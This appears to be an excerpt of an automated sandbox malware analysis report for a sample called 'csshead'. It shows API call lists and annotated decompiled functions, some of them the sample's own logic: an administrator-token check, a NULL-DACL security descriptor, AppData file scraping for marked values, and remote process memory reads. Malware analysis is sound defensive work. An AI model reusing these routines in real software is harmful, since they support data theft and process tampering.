    APIs
      • Part of subcall function 0042AFAC: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0042AFEF
    • Sleep.KERNEL32(00000000), ref: 0042A14C
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			// Allocation with retry: E0042AFAC (RtlAllocateHeap, see the API list) is
    			// called repeatedly; after each failure the thread sleeps for the current
    			// wait, the wait grows by 1000 ms per round, and the loop gives up once it
    			// exceeds the global limit at 0x443340. Returns the allocation or 0. The
    			// shape is consistent with the MSVC CRT's _calloc_crt retry loop, so this is
    			// runtime code rather than sample logic.
    			E0042A124(signed int _a4, signed int _a8) {
    				long _t3; // was undeclared in the decompiler output
    				void* _t4;
    				long _t6;
    				void* _t7;
    				long _t8;
    				void* _t9;
    
    				_t8 = 0; // current wait in ms
    				while(1) {
    					_t4 = E0042AFAC(_a4, _a8, 0); // executed
    					_t7 = _t4;
    					_t9 = _t9 + 0xc; // decompiler residue: stack clean-up of the 3 pushed arguments
    					if(_t7 != 0 ||  *0x443340 <= _t4) {
    						break; // success, or retrying is disabled (limit <= 0)
    					}
    					Sleep(_t8);
    					_t3 = _t8 + 0x3e8; // 0x3e8 = 1000 ms back-off step
    					_t6 = _t3;
    					if(_t6 >  *0x443340) {
    						_t6 = _t6 | 0xffffffff; // past the limit: stop retrying
    					}
    					_t8 = _t6;
    					if(_t6 != 0xffffffff) {
    						continue;
    					}
    					break;
    				}
    				return _t7;
    			}

    APIs
      • Part of subcall function 0042AFAC: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0042A13A,00000214,00000001,00000000,00000000,00000000,?,00425E9D,00000001,00000214), ref: 0042AFEF
    • Sleep.KERNEL32(00000000,00000001,00000214), ref: 0042A14C
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			// Same retry loop as E0042A124, wrapping the single-size allocator E00422A18
    			// (RtlAllocateHeap, see the API list); consistent with the MSVC CRT's
    			// _malloc_crt. __edi/__esi are passed through uninitialised, which is
    			// decompiler residue for register arguments the callee does not use.
    			E0042A0DF(intOrPtr _a4) {
    				void* __edi;
    				void* __esi;
    				long _t2; // was undeclared in the decompiler output
    				void* _t3;
    				long _t5;
    				void* _t7;
    				void* _t8;
    				long _t9;
    
    				_t9 = 0; // current wait in ms
    				while(1) {
    					_t3 = E00422A18(_t7, _t8, _t9, _a4); // executed
    					_t8 = _t3;
    					if(_t8 != 0 ||  *0x443340 <= _t3) {
    						break; // success, or retrying is disabled (limit <= 0)
    					}
    					Sleep(_t9);
    					_t2 = _t9 + 0x3e8; // 0x3e8 = 1000 ms back-off step
    					_t5 = _t2;
    					if(_t5 >  *0x443340) {
    						_t5 = _t5 | 0xffffffff; // past the limit: stop retrying
    					}
    					_t9 = _t5;
    					if(_t5 != 0xffffffff) {
    						continue;
    					}
    					break;
    				}
    				return _t8;
    			}

    APIs
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0042A0F0,?,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6), ref: 00422A5D
    • Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 01960593
    Memory Dump Source
    • Source File: 00000000.00000002.16599178748.01960000.00000040.sdmp, Offset: 01960000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1960000_csshead.jbxd
    APIs
    • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 01963877
    Memory Dump Source
    • Source File: 00000000.00000002.16599191923.01963000.00000040.sdmp, Offset: 01963000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1963000_csshead.jbxd
    APIs
    • VirtualFree.KERNELBASE(?,?,?), ref: 01960560
    Memory Dump Source
    • Source File: 00000000.00000002.16599178748.01960000.00000040.sdmp, Offset: 01960000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1960000_csshead.jbxd
    C-Code - Quality: 100%
    			// Allocates _v12 bytes of fresh read/write memory: 0x3000 = MEM_COMMIT | MEM_RESERVE,
    			// 4 = PAGE_READWRITE. The pointer is stored through __eax and also returned.
    			E004013B4(void** __eax, long __edx) {
    				void** _v8;
    				long _v12;
    				void* _t7;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_t7 = VirtualAlloc(0, _v12, 0x3000, 4); // executed
    				 *_v8 = _t7;
    				return _t7;
    			}

    APIs
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • VirtualFree.KERNELBASE(?,?,?), ref: 01963844
    Memory Dump Source
    • Source File: 00000000.00000002.16599191923.01963000.00000040.sdmp, Offset: 01963000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1963000_csshead.jbxd
    APIs
    • GlobalAlloc.KERNELBASE(?,?), ref: 019604FD
    Memory Dump Source
    • Source File: 00000000.00000002.16599178748.01960000.00000040.sdmp, Offset: 01960000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1960000_csshead.jbxd
    APIs
    • GlobalAlloc.KERNELBASE(?,?), ref: 01963781
    Memory Dump Source
    • Source File: 00000000.00000002.16599191923.01963000.00000040.sdmp, Offset: 01963000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1963000_csshead.jbxd
    C-Code - Quality: 100%
    			// Releases a region obtained from VirtualAlloc (E004013B4): dwSize = 0 with
    			// 0x8000 = MEM_RELEASE frees the whole reservation.
    			E00401828(void* __eax) {
    				void* _v8;
    				int _t5;
    
    				_v8 = __eax;
    				_t5 = VirtualFree(_v8, 0, 0x8000); // executed
    				return _t5;
    			}

    APIs
    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Non-executed Functions

    APIs
    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 004181EE
    • GetWindowLongA.USER32(?,000000EB), ref: 004181FC
    • OleUninitialize.OLE32 ref: 0041820E
    • OleInitialize.OLE32(00000000), ref: 0041821B
    • GetWindowTextLengthA.USER32(?), ref: 00418222
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • GetWindowTextA.USER32(?,00000000,00000001), ref: 00418279
    • SetWindowTextA.USER32(?,00433C2B), ref: 00418285
    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004182AC
    • GlobalFix.KERNEL32(00000000), ref: 004182B9
    • GlobalUnWire.KERNEL32(00000000), ref: 004182D4
    • SysFreeString.OLEAUT32(00000000), ref: 00418309
    • lstrlen.KERNEL32(00000000), ref: 0041833E
      • Part of subcall function 00410680: SysFreeString.OLEAUT32(00000000), ref: 00410749
      • Part of subcall function 00410680: SysAllocString.OLEAUT32(?), ref: 00410778
    • SysFreeString.OLEAUT32(00000000), ref: 004183FC
    • SetWindowLongA.USER32(?,000000EB,?), ref: 00418421
    • SysFreeString.OLEAUT32(00000000), ref: 00418438
    • NtdllDefWindowProc_A.NTDLL(?,00000000,?,?), ref: 00418462
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 00417F2E
    • GetWindowLongA.USER32(?,000000EB), ref: 00417F3F
    • OleUninitialize.OLE32 ref: 00417F51
    • OleInitialize.OLE32(00000000), ref: 00417F5E
    • GetWindowTextLengthA.USER32(?), ref: 00417F68
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • GetWindowTextA.USER32(?,00000000,00000001), ref: 00417FB7
    • SetWindowTextA.USER32(?,00433C2A), ref: 00417FC3
    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00417FEA
    • GlobalFix.KERNEL32(00000000), ref: 00417FF7
    • GlobalUnWire.KERNEL32(00000000), ref: 00418012
    • lstrlen.KERNEL32(00000000), ref: 00418031
      • Part of subcall function 00410680: SysFreeString.OLEAUT32(00000000), ref: 00410749
      • Part of subcall function 00410680: SysAllocString.OLEAUT32(?), ref: 00410778
    • SetWindowLongA.USER32(?,000000EB,?), ref: 00418139
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00418176
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			// Returns 1 if the caller's token (the thread token, falling back to the
    			// process token) lists the Administrators alias RID, else 0.
    			E004041C8(intOrPtr* __eax) {
    				char _v5;
    				void* _v12;
    				void* _v16;
    				long _v20;
    				void* _v24;
    				signed int _v28;
    				int _v32;
    				char _v36;
    				void* _t52;
    				char* _t28; // was undeclared in the decompiler output
    
    				 *__eax =  *__eax + __eax; // decompiler residue (add [eax], eax), not meaningful
    				_v5 = 0;
    				// 8 = TOKEN_QUERY, OpenAsSelf = TRUE
    				_v32 = OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v12);
    				if(_v32 == 0 && GetLastError() == 0x3f0) { // 0x3f0 = ERROR_NO_TOKEN: not impersonating
    					_v32 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
    				}
    				if(_v32 != 0) {
    					_v16 = E004013DC(0x400); // 1 KiB from the process heap (GetProcessHeap/RtlAllocateHeap)
    					// 2 = TokenGroups. The fixed 0x400 buffer is not retried on
    					// ERROR_INSUFFICIENT_BUFFER, so tokens with many groups yield 0 here.
    					_v32 = GetTokenInformation(_v12, 2, _v16, 0x400,  &_v20);
    					CloseHandle(_v12);
    					if(_v32 != 0) {
    						// Two sub-authorities: 0x20 = SECURITY_BUILTIN_DOMAIN_RID, 0x220 = DOMAIN_ALIAS_RID_ADMINS.
    						// 0x40a2a4 points to the SID_IDENTIFIER_AUTHORITY (bytes not shown here); with
    						// SECURITY_NT_AUTHORITY this is S-1-5-32-544, BUILTIN\Administrators.
    						AllocateAndInitializeSid(0x40a2a4, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
    						_t52 =  *_v16 - 1; // TOKEN_GROUPS.GroupCount - 1
    						if(_t52 >= 0) {
    							_v36 = _t52 + 1;
    							_v28 = 0;
    							// Groups[i].Sid sits at offset 4 + i * sizeof(SID_AND_ATTRIBUTES) (8 bytes on x86)
    							while(EqualSid(_v24,  *(_v16 + 4 + _v28 * 8)) == 0) {
    								_v28 = _v28 + 1;
    								_t28 =  &_v36;
    								 *_t28 = _v36 - 1;
    								if( *_t28 != 0) {
    									continue;
    								}
    								goto L11; // no group matched
    							}
    							_v5 = 1; // Administrators SID present
    						}
    						L11:
    						FreeSid(_v24);
    					}
    					E00401440(_v16); // HeapFree
    				}
    				return _v5;
    			}
    			// Only SID presence is tested, never the group attributes. In a UAC-filtered
    			// token the Administrators SID is still listed (flagged SE_GROUP_USE_FOR_DENY_ONLY),
    			// so this also returns 1 for a non-elevated administrator; CheckTokenMembership
    			// is the robust way to answer the same question.

    APIs
    • GetCurrentThread.KERNEL32 ref: 004041DE
    • OpenThreadToken.ADVAPI32(00000000), ref: 004041E5
    • GetLastError.KERNEL32 ref: 004041F4
    • GetCurrentProcess.KERNEL32 ref: 00404207
    • OpenProcessToken.ADVAPI32(00000000), ref: 0040420E
      • Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
      • Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2
    • GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00404241
    • CloseHandle.KERNEL32(?), ref: 0040424E
    • AllocateAndInitializeSid.ADVAPI32(0040A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404278
    • EqualSid.ADVAPI32(?,?), ref: 004042A2
    • FreeSid.ADVAPI32(?), ref: 004042BE
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • GetWindowLongA.USER32(?,000000F0), ref: 00420B8F
    • GetWindowLongA.USER32(?,000000F0), ref: 00420BD1
    • IsWindowVisible.USER32(?), ref: 00420C04
    • IsIconic.USER32(?), ref: 00420C1C
    • ShowWindow.USER32(?,000000FF), ref: 00420C4A
    • GetWindowLongA.USER32(?,000000F0), ref: 00420C73
    • GetParent.USER32(000000FF), ref: 00420CE8
      • Part of subcall function 00419340: GetParent.USER32(?), ref: 00419379
      • Part of subcall function 00419340: DrawMenuBar.USER32(00000000), ref: 00419380
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00423A06
    • GetSystemInfo.KERNEL32(?), ref: 00423A1E
    • GetModuleHandleW.KERNEL32(00436BE8), ref: 00423A2E
    • GetProcAddress.KERNEL32(00000000,00436BD0), ref: 00423A3E
    • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 00423A90
    • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 00423AA5
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 64%
    			// Builds a security descriptor: revision 1, a present-but-NULL DACL (no access
    			// restrictions at all) and a SACL copied from a descriptor converted from the
    			// SDDL string at 0x401cb4 (string contents not shown on the page). Optionally
    			// fills the caller's SECURITY_ATTRIBUTES at __eax.
    			E00404406(intOrPtr* __eax, struct _SECURITY_DESCRIPTOR* __edx) {
    				intOrPtr* _v8;
    				struct _SECURITY_DESCRIPTOR* _v12;
    				struct _ACL* _v16;
    				void* _v20;
    				int _v24;
    				int _v28;
    				struct _ACL* _v32;
    				intOrPtr _t37;
    				signed int _t38;
    				signed int _t50;
    				signed int _t59;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0;
    				// InitializeSecurityDescriptor(sd, SECURITY_DESCRIPTOR_REVISION = 1);
    				// SetSecurityDescriptorDacl(sd, bDaclPresent = TRUE, pDacl = NULL, bDaclDefaulted = FALSE):
    				// a NULL DACL grants full access to every caller.
    				if(InitializeSecurityDescriptor(_v12, 1) != 0 && SetSecurityDescriptorDacl(_v12, 0xffffffff, 0, 0) != 0) {
    					_t37 =  *0x40a0d4; // 0x401cb4: SDDL string
    					// The import at 0x40b32c is ConvertStringSecurityDescriptorToSecurityDescriptorA
    					// (see the API list); SDDL_REVISION_1 = 1, result (LocalAlloc'd) in _v20
    					_t38 =  *0x40b32c(_t37, 1,  &_v20, 0);
    					asm("sbb eax, eax");
    					if( ~( ~_t38) == 0) { // decompiler's rendering of "the call returned FALSE"
    						_v20 = 0xffffffff;
    					} else {
    						_v32 = 0;
    						// Copy the SACL of the converted descriptor into the caller's descriptor
    						_t50 = GetSecurityDescriptorSacl(_v20,  &_v24,  &_v32,  &_v28);
    						asm("sbb eax, eax");
    						if( ~( ~_t50) == 0) {
    							L6:
    							LocalFree(_v20);
    							_v20 = 0xffffffff;
    						} else {
    							_t59 = SetSecurityDescriptorSacl(_v12, _v24, _v32, _v28);
    							asm("sbb eax, eax");
    							if( ~( ~_t59) == 0) {
    								goto L6;
    							}
    						}
    					}
    					if(_v8 != 0) {
    						// SECURITY_ATTRIBUTES { nLength = 12, lpSecurityDescriptor, bInheritHandle = FALSE }
    						 *_v8 = 0xc;
    						 *(_v8 + 4) = _v12;
    						 *((intOrPtr*)(_v8 + 8)) = 0;
    					}
    					// On success _v20 still owns the converted descriptor whose SACL the
    					// caller's descriptor now references, so it must outlive _v12.
    					_v16 = _v20;
    				}
    				return _v16; // converted descriptor, -1 on SDDL/SACL failure, 0 if the DACL setup failed
    			}

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0040441F
    • SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00404437
    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401CB4,00000001,?,00000000), ref: 00404453
    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404478
    • SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404498
    • LocalFree.KERNEL32(?), ref: 004044AC
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 91%
    			// Enumerates the folder CSIDL_APPDATA (0x1a) with the suffix at 0x401e60
    			// appended, reads each matching file, looks for three marker strings
    			// (0x401e2c, 0x401e3c, 0x401e4c; contents not shown on the page) and copies
    			// the quoted values that follow them into the caller's buffer. Only the first
    			// file containing the first marker is processed. Returns -1 if both values
    			// were extracted, 0 otherwise.
    			E00405640(char* __eax, void* __ecx, void* __edx) {
    				char* _v8;
    				intOrPtr _v12;
    				void* _v16;
    				char _v20;
    				intOrPtr _v24;
    				char* _v28;
    				char* _v32;
    				struct _WIN32_FIND_DATAA _v352;
    				char _v609;
    				char _v866;
    				intOrPtr _t68;
    				int _t81;
    				intOrPtr _t89;
    				intOrPtr _t127;
    				intOrPtr _t128;
    				intOrPtr _t131;
    				void* _t133;
    				void* _t134;
    				void* _t135;
    
    				_v8 = __eax; // output buffer
    				_v12 = 0;
    				 *_v8 = 0;
    				// The import at 0x40b21c is SHGetSpecialFolderPathA (see the API list):
    				// (hwnd = 0, path, CSIDL_APPDATA = 0x1a, fCreate = TRUE)
    				 *0x40b21c(0,  &_v609, 0x1a, 0xffffffff);
    				_t68 =  *0x40a188; // 0x401e60
    				E0040133C( &_v609, _t68); // append the search pattern to the folder path
    				_t135 = _t134 + 8;
    				_v352.dwFileAttributes = 0x80; // FILE_ATTRIBUTE_NORMAL
    				_v16 = FindFirstFileA( &_v609,  &_v352);
    				 *((char*)(_t133 + E004012DC( &_v609) - 0x25e)) = 0; // E004012DC: string length; strips the pattern again
    				if(_v16 == 0xffffffff) { // INVALID_HANDLE_VALUE
    					L12:
    					FindClose(_v16);
    					return _v12;
    				} else {
    					goto L1;
    				}
    				do {
    					L1:
    					if(_v352.cFileName == 0x2e) { // skip names starting with '.'
    						goto L11;
    					}
    					E00401308( &_v866,  &_v609); // copy folder path
    					E0040133C( &_v866,  &(_v352.cFileName)); // append entry name
    					_t89 =  *0x40a178; // 0x401e20
    					E0040133C( &_v866, _t89); // append file-name suffix
    					_t135 = _t135 + 0x10;
    					if(E00403988( &_v866) == 0) { // existence check (FindFirstFileA/FindClose)
    						goto L11;
    					}
    					_v24 = E004047AC( &_v866,  &_v20); // read the whole file; returns its size
    					if(_v24 <= 0) {
    						goto L11;
    					}
    					 *((char*)(_v20 + _v24)) = 0; // NUL-terminate the file contents
    					_t127 =  *0x40a17c; // 0x401e2c
    					_v28 = E00401110(_v20, _t127); // E00401110: substring search (strstr-like)
    					if(_v28 == 0) {
    						E00401828(_v20);
    						goto L11;
    					}
    					_v28 = _v28 + 0xd; // advance past the marker
    					if( *_v28 == 0x31) { // the value after the first marker must be '1'
    						_t128 =  *0x40a180; // 0x401e3c
    						_v28 = E00401110(_v20, _t128);
    						if(_v28 != 0) {
    							_v28 = _v28 + 0xe; // advance past the marker
    							// 0x40584c is a short string constant used as the search term, like
    							// 0x405850 below; the decompiler had mislabelled it as a function (E0040584C)
    							_v32 = E00401110(_v28, 0x40584c);
    							 *_v32 = 0; // cut at the closing quote
    							E00401308(_v8, _v28); // copy the first value
    							 *_v32 = 0x22; // restore the '"'
    							_t131 =  *0x40a184; // 0x401e4c
    							_v28 = E00401110(_v20, _t131);
    							if(_v28 != 0) {
    								_v28 = _v28 + 0x12; // advance past the marker
    								_v32 = E00401110(_v28, 0x405850);
    								 *_v32 = 0;
    								E0040133C(_v8, 0x405854); // separator string
    								E0040133C(_v8, _v28); // append the second value
    								_v12 = 0xffffffff; // both values found
    							}
    						}
    					}
    					E00401828(_v20); // free the file buffer
    					goto L12; // first file with the marker ends the enumeration
    					L11:
    					_t81 = FindNextFileA(_v16,  &_v352);
    					asm("sbb eax, eax");
    				} while ( ~( ~_t81) != 0); // loop while FindNextFileA returned TRUE
    				goto L12;
    			}

    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00405664
    • FindFirstFileA.KERNEL32(?,00000080), ref: 00405697
      • Part of subcall function 00403988: FindFirstFileA.KERNEL32(?,?), ref: 004039A4
      • Part of subcall function 00403988: FindClose.KERNEL32(000000FF), ref: 004039BF
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004047FB
      • Part of subcall function 004047AC: GetFileSize.KERNEL32(?,00000000), ref: 00404810
      • Part of subcall function 004047AC: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
      • Part of subcall function 004047AC: CloseHandle.KERNEL32(?), ref: 00404849
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    • FindNextFileA.KERNEL32(000000FF,00000080), ref: 00405825
    • FindClose.KERNEL32(000000FF), ref: 0040583D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • IsDebuggerPresent.KERNEL32 ref: 0042FAF6
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
    • UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
    • GetCurrentProcess.KERNEL32 ref: 0042FB32
    • TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E00404DE0(void* __eax, void* __eflags) {
    				void* _v8;
    				intOrPtr _v12;
    				long _v16;
    				void _v20;
    				long _v24;
    				void _v28;
    				intOrPtr _v48;
    				void _v52;
    
    				_v8 = __eax;
    				_v12 = 0;
    				E00401258( &_v52, 0x18);
    				_v16 = NtQueryInformationProcess(_v8, 0,  &_v52, 0x18, 0);
    				if(_v16 == 0 && _v48 != 0) {
    					_v20 = _v48 + 8;
    					ReadProcessMemory(_v8, _v20,  &_v28, 4,  &_v24);
    					_v20 = _v28 + 0x3c;
    					ReadProcessMemory(_v8, _v20,  &_v20, 4,  &_v24);
    					_v20 = _v20 + _v28 + 0x28;
    					ReadProcessMemory(_v8, _v20,  &_v20, 4,  &_v24);
    					_v12 = _v20 + _v28;
    				}
    				return _v12;
    			}

    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00404E09
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E39
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E5A
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E7E
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
      • Part of subcall function 00423991: RaiseException.KERNEL32(?,?,00423990,000000F4,?,?,?,?,00423990,000000F4,0043C9F8,00442BF0,000000F4,?,?,00000000), ref: 004239D3
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
      • Part of subcall function 00410680: SysFreeString.OLEAUT32(00000000), ref: 00410749
      • Part of subcall function 00410680: SysAllocString.OLEAUT32(?), ref: 00410778
    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 00417F2E
    • GetWindowLongA.USER32(?,000000EB), ref: 00417F3F
    • OleUninitialize.OLE32 ref: 00417F51
    • OleInitialize.OLE32(00000000), ref: 00417F5E
    • GetWindowTextLengthA.USER32(?), ref: 00417F68
    • GetWindowTextA.USER32(?,00000000,00000001), ref: 00417FB7
    • SetWindowTextA.USER32(?,00433C2A), ref: 00417FC3
    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00417FEA
    • GlobalFix.KERNEL32(00000000), ref: 00417FF7
    • GlobalUnWire.KERNEL32(00000000), ref: 00418012
    • lstrlen.KERNEL32(00000000), ref: 00418031
    • SetWindowLongA.USER32(?,000000EB,?), ref: 00418139
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00418176
